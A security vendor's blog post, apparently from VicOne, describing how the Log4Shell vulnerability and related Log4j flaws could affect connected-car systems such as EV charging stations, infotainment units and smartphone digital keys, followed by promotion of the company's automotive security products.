Uncovering Log4j Vulnerabilities in Connected Cars

September 13, 2022
Uncovering Log4j Vulnerabilities in Connected Cars

Most IT and cybersecurity teams consider the Log4Shell (CVE-2021-44228) to be one of the worst cyberthreats in recent years. With a severity score of 10 out of 10 (CVSS v3.1), this remote code execution (RCE) vulnerability enables malicious actors to execute arbitrary code that could allow them to take over a targeted system from anywhere in the world. 

Amazon, Apple, Cloudflare, Google, Tencent, Twitter and almost every company that uses Java were vulnerable targets at some point. Further expanding its attack surface, Log4Shell also affects the embedded systems and various electronic control units (ECUs) in connected cars. This includes charging stations, in-vehicle infotainment (IVI), and remote keyless entry (RKE) systems, among others. In a research published in 2021, Trend Micro security researcher Sébastien Dudek discussed just how Log4j vulnerabilities also affect the automotive industry.

Charging stations at risk

Vehicle-to-grid (V2G) systems allow stored energy in car batteries to be redistributed over the grid. It is composed of at least two parts: an electric vehicle (EV) and its charging station. These connect to a central management system through the Open Charge Point Protocol (OCPP), the network protocol for the growing electric vehicle (EV) industry across Europe and North America.

In this report by Trend Micro, threat researchers demonstrated how Log4Shell and two other vulnerabilities (CVE-2021-45046 and CVE-2021-45105) could provide attackers with backdoor access to vehicle charging stations that use the V2G stack in Java.

IVI systems compromised in the wild

Aside from EV charging stations, the connected cars’ IVI systems, especially those that have the Log4j library, could be at risk. Through demonstrations, various researchers have also shown that malicious actors can compromise Tesla automobiles using simple exploit strings, after which they can issue commands and steal sensitive data from its back-end servers. Cybercriminals could also use the Log4Shell vulnerability to potentially push malicious firmware over-the-air (FOTA) updates.

Digital keys vulnerable to Log4Shell?

Smartphones can now replace key fobs in RKE systems. The phones can allow entry or even control some parts of a modern vehicle, but the applications that enable these features could be affected by the Apache Log4j vulnerability. Potential attackers can even change several configurations of a car to exploit the vulnerability.

VicOne solutions

Apache has since advised its users to update their libraries with the latest version. Aside from software updates, VicOne recommends a more comprehensive automotive cybersecurity strategy to better protect today’s connected vehicles from severe vulnerabilities in the future.

As a prospective Trend Micro subsidiary, VicOne leverages the cybersecurity leader’s 30+ years of industry expertise and offers the following solutions:

  • xNexus, a detection and response (DR) platform for vehicle security operation centers (VSOCs), can help build awareness mechanisms and early warning for incoming attacks.
  • xCarbon (intrusion detection and prevention system or IDPS for ECUs) provides superior detection protection in vehicles, allowing security operations centers (SOCs) to quickly understand the nature of a potential attack.
  • xZETA allows OEMs to scan vendors' firmware on multiple levels and effectively reduces the attack surface from the beginning.
  • xScope is a penetration-testing service that conducts a deep assessment of an entire vehicle to identify vulnerabilities and provide recommendations.

To read more research on other possible vulnerabilities in connected vehicles and learn best security practices, visit our resource center.

Our News and Views

Gain Insights Into Automotive Cybersecurity
Visit Our Blog

Accelerate Your Automotive Cybersecurity Journey Today

Contact Us